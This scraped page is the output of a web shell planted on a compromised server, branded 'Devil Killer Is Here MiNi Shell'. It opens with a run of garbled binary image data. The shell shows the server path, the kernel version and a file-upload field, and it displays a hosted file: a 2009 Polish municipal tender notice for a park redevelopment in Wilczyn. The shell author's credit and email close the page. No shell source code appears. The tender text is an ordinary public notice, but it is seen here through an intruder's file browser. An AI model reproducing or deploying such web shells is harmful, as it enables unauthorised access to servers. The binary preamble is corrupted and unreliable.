JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090907/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090907/149905-N-2009.html

<p class="kh_header"><b>Wilczyn: Zagospodarowanie terenu parku w Wilczynie</b><br>
<b>Numer ogłoszenia: 149905 - 2009; data zamieszczenia: 07.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Wilczynie , ul. Strzelińska 12D, 62-550 Wilczyn, woj. wielkopolskie, tel. 063 2683032, faks 063 2685045.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wilczyn.bazagmin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zagospodarowanie terenu parku w Wilczynie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> -race przygotowawcze: uporządkowanie i wyrównanie terenu,
-cięcie chorych lub suchych drzew,
-awiezienie urodzajnej ziemi, 
-ykonanie nawierzchni utwardzonej (kostka brukowa - 750 m2),
-ontaż elementów małej architektury: fontanny, placu zabaw, ławek, koszy na śmieci,
-wykonannie nasadzeń,
-wyknanie trawnika 3030m2 
-renowacja pomnika
-przebudowa zatoki parkingowej
-zakup kontenerów WC- szt. 2 

Szczegółowy opis przedmiotu zamówienia stanowią załączniki:
-przedmiary robót na zagospodarowanie terenu parku i przebudowę zatoki parkingowej (Załącznik Nr 7 do SIWZ)
-projekt zagospodarowania parku (Załącznik Nr 8 do SIWZ)
Kontenery WC powinny spełniać następujące wymagania:
1. Podłoga:
a) konstrukcja ramy:
- walcowane na zimno, spawane profile stalowe o gr. 2-2,5 mm,
- spawane nogi kontenera
- belka nośna podłogi o gr. 2,5 mm
b) izolacja:
- z płyty z waty mineralnej o gr. 60 mm
- klasa palności A - nie palna
c) podłoga:
- 3 mm podłoga z blachy aluminiowej połączona śrubami z 22 mm - ową podłogą z płyty wiórowej
2.   Dach:
a) konstrukcja ramy:
- walcowane na zimno, spawane profile stalowe o gr. 2 - 2,5 mm,
- drewniana lub stalowa belka nośna dachu 
- 4 szt. uchwytów dźwigowych
b) pokrycie:
- ocynkowana blacha stalowa o gr. 0,63 mm blacha przynitowana do profilu dachowego,
c) izolacja:
- płyty z waty mineralnej o gr. 160 mm
- klasa palności A - nie palny
d) obudowa dachu:
- obustronnie powleczona płyta wiórowa 10 mm
3. Słupki narożne:
- walcowane na zimno gr. 2 mm profile stalowe spawane z dachem i podłogą
4. Elementy ścienne:
- wykonane z pianki poliuretanowej gr. 45 mm
a) obudowa zewnętrzna:
- z profilowanej ocynkowanej blachy o gr. 0,6 mm
- malowane
b) izolacja:
- poliuretan 45
- klasa palności B2
c) obudowa wewnętrzna:
- ocynkowana blacha stalowa gr. 0,5 mm
5. Ścianki działowe:
- wykonane z pianki poliuretanowej gr. 45 mm
a) izolacja:
- poliuretan 45
- klasa palności B2
c) obudowa:
- ocynkowana blacha stalowa gr. 0,5 mm
6. Drzwi:
- zamocowane z prawej strony
- wymiar zewnętrzny 1000 x 2000 mm
a) odrzwia:
- stalowa odrzwia z uszczelką
b) skrzydło drzwiowe:
- z obustronnie ocynkowaną blachą, z izolacją 40 mm i integrowanym oknem      zbrojonym 500 x 450 mm
c) zamek:
- otwierany na wrzut monety
7. Instalacje elektryczne:
a) dane techniczne:
- wpuszczone połączenie CEE poprzez tynkową wtyczkę 
- napięcie 230
- 50/60 Hz; 3 ogniwa; 32 A
- skrzynka rozdzielcza natynkowa/ do pomieszczeń wilgotnych,  
              jednoszeregowa
- wyłącznik ochronny prądu 40/0,03 A - 2 ogniwa
- przełącznik bezpiecznikowy 13 A - 2 ogniwa
- przełącznik bezpiecznikowy 16 A - 2 ogniwa
- przełącznik schodowy do pomieszczeń wilgotnych - 2 moduły
- lampa zwykła
b) uziemienie:
- przewodem uziemiającym z ocynkowanego płaskownika stalowego i 
             sprzączką krzyżową
8. Instalacja wodociągowa:
a) doprowadzenie:
- poprzez tylną ścianę kontenera ? rura PCV
b) wewnątrz:
- rury PCV
c) odprowadzenie:
- odpływ ścieków z kontenera przez tylną ścianę rurami PCV 110
9. Ogrzewanie: 
- indywidualne ogrzewanie za pomocą czujnika przeciwmroźnego 
           0,5 kW/230 V mechaniczna wentylacja - elektrycznym wentylatorem
10. Wytrzymałość na wiatr:
- przymocowanie kontenera stalowymi linami
11. Lakierowanie:
- powłoka lakieru z wysoką odpornością na czynniki atmosferyczne i starzenie się.
Kontenery WC powinny być przystosowane dla osób niepełnosprawnych.

Fontanna powinna spełniać następujące wymagania:
- średnica 600 cm
- wysokość 55 cm
- obrzeża fontannowe z sześcioma muszlami wpisanymi w okrąg o średnicy 6 metrów, wraz z podstawą i wewnętrznymi pilastrami zakończonymi wizerunkiem głowy wilka z wyjściem na dysze kierunkowe 48 elementów
- surowcem stosowanym na wykonanie fontanny jest konglomerat mielonego piaskowca naturalnego oraz spoiw mineralnych bez dodatku jakichkolwiek żywic syntetycznych czy tworzyw sztucznych.

Renowacja pomnika powinna obejmować:
- obłożenie płytami granitowymi istniejącego pomnika
- zamontowanie nowej tablicy z napisem
- zamontowanie nowego godła państwa
- wymiana płyty wokół pomnika
- wykonanie chodnika do pomnika

Wszystkie materiały i urządzenia muszą posiadać aktualne atesty, świadectwa 
o dopuszczeniu do użytku oraz powinny odpowiadać obowiązującym normom polskim i unijnym. 
Dokumentacja projektowa znajduje się także do wglądu w siedzibie Zamawiającego, tj. w Urzędzie Gminy w Wilczynie.
Zaleca się, aby Wykonawca zdobył wszelkie informacje, które mogą być konieczne do przygotowania oferty, określenia ceny zamówienia i podpisania umowy, tj. zapoznał się z dokumentacją projektową i w odniesieniu do niej dokonał weryfikacji przedmiarów robót oraz dokonał wizji lokalnej w miejscu realizacji zadań. W przypadku zauważonych rozbieżności Wykonawca winien porozumieć się z Zamawiającym i uzyskać informacje na zasadach określonych w niniejszej specyfikacji..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.10-5, 45.11.12.91-4, 77.30.00.00-3, 77.31.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 4.000,00 zł (słownie złotych: cztery tysiące złotych).
2.	Wykonawca może wnieść wadium w jednej lub w kilku formach przewidzianych 
w art. 45 ust. 6 ustawy, tj.:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dna 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr z 2007 Nr 42, poz. 275).
3.	Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
4.	Wadium w pieniądzu należy wnieść przelewem  na konto Zamawiającego:

Bank Spółdzielczy w Koninie O/Wilczyn   Nr 64 8530 0000 0300 0260 2000 0006
5.	W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego.
6.	W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego w pokoju nr 12, a kserokopię potwierdzoną za zgodność dołączyć do oferty. W przypadku wniesienia wadium w pieniądzu do oferty należy dołączyć kserokopię dowodu wpłaty.
7.	Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 4 ustawy, a jego oferta zostanie uznana za odrzuconą na podstawie art. 24 ust. 4 ustawy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału określone w art. 22 ust. 1 ustawy Pzp. 

1.1.	Spełnienie warunków udziału odnoszących się do posiadania niezbędnej wiedzy 
i doświadczenia,  dysponowania  osobami zdolnymi do wykonania zamówienia oraz sytuacji finansowej i ekonomicznej zostanie oceniona na podstawie złożonych dokumentów :
1) informacji na temat dysponowania osobami zdolnymi do wykonania zamówienia, legitymującymi się odpowiednimi kwalifikacjami zawodowymi, doświadczeniem, wykształceniem, tj. co najmniej: 
- jedną osobą posiadającą wykształcenie wyższe ogrodnicze lub architektura krajobrazu oraz 3 lata praktyki w zawodzie lub wykształcenie średnie ogrodnicze lub architektura krajobrazu oraz 5 lat praktyki w zawodzie,
- jedną osobę posiadającą uprawnienia budowlane i potwierdzoną przynależność  do Okręgowej Izby Samorządu Zawodowego w oparciu o art. 6 ust. 1 ustawy 
z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów oraz urbanistów (Dz. U. z 2001 r., Nr 5, poz. 42 ze zm.) 
wraz z dokumentami potwierdzającymi ich kwalifikacje, ze wskazaniem osoby do pełnienia funkcji kierownika budowy i załączeniem dokumentów potwierdzających jej uprawnienia budowlane oraz zaświadczenia o przynależności- wg wzoru stanowiącego Załącznik  Nr 6 do SIWZ
2)	wykazu wykonanych robót budowlanych w ciągu ostatnich 5 lat przed dniem wszczęciem postępowania tj. przed datą publikacji ogłoszenia o zamówieniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadającym swoim rodzajem przedmiotowi zamówienia z podaniem ich wartości, dat wykonania oraz odbiorców. Do wykazu Wykonawca zobowiązany jest dołączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie (referencje, protokoły odbioru, itp.) Wykaz należy sporządzić zgodnie ze wzorem stanowiącym Załącznik Nr 5 do niniejszej SIWZ.
3)	polisy lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej,
2.	Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty.
3.	Zamawiający wezwie w trybie art.26 ust.3 Wykonawców, którzy w określonym terminie nie złożyli oświadczeń i dokumentów potwierdzających spełnianie warunków udziału w postępowaniu lub, którzy złożyli dokumenty zawierające błędy, do ich uzupełnienia w wyznaczonym terminie chyba, że mimo ich uzupełnienia oferta wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 - Wykonawca składa oświadczenia, których wzór stanowią Załącznik Nr 3 oraz Załącznik Nr 4 do niniejszej SIWZ.
W celu potwierdzenia, że Wykonawca posiada uprawnienia do określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ust.1 ustawy do oferty dołączyć należy:

1)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
2)	Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego, potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
3)	Aktualne zaświadczenie oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
W celu potwierdzenia spełnienia warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania osobami zdolnymi do wykonania zamówienia do oferty dołączyć należy:
1) wykazu wykonanych robót budowlanych w ciągu ostatnich 5 lat przed dniem wszczęciem postępowania tj. przed datą publikacji ogłoszenia o zamówieniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadającym swoim rodzajem przedmiotowi zamówienia z podaniem ich wartości, dat wykonania oraz odbiorców. Do wykazu Wykonawca zobowiązany jest dołączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie (referencje, protokoły odbioru, itp.) Wykaz należy sporządzić zgodnie ze wzorem stanowiącym Załącznik Nr 5 do niniejszej SIWZ.
2) informacji na temat dysponowania osobami zdolnymi do wykonania zamówienia, legitymującymi się odpowiednimi kwalifikacjami zawodowymi, doświadczeniem, wykształceniem, tj. co najmniej: 
- jedną osobą posiadającą wykształcenie wyższe ogrodnicze lub architektura krajobrazu oraz 3 lata praktyki w zawodzie lub wykształcenie średnie ogrodnicze lub architektura krajobrazu oraz 5 lat praktyki w zawodzie,
- jedną osobę posiadającą uprawnienia budowlane i potwierdzoną przynależność  do Okręgowej Izby Samorządu Zawodowego w oparciu o art. 6 ust. 1 ustawy 
z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów oraz urbanistów (Dz. U. z 2001 r., Nr 5, poz. 42 ze zm.) 
wraz z dokumentami potwierdzającymi ich kwalifikacje, ze wskazaniem osoby do pełnienia funkcji kierownika budowy i załączeniem dokumentów potwierdzających jej uprawnienia budowlane oraz zaświadczenia o przynależności- wg wzoru stanowiącego Załącznik  Nr 6 do SIWZ
W celu potwierdzenia spełnienia warunku znajdowania się przez Wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia do oferty dołączyć należy:
1)	polisę lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej,.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wilczyn.bazagmin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Wilczynie
               ul. Strzelińska 12 D
               62-550 Wilczyn.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.09.2009 godzina 09:00, miejsce: Urząd Gminy w Wilczynie
               ul. Strzelińska 12 D
               62-550 Wilczyn.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com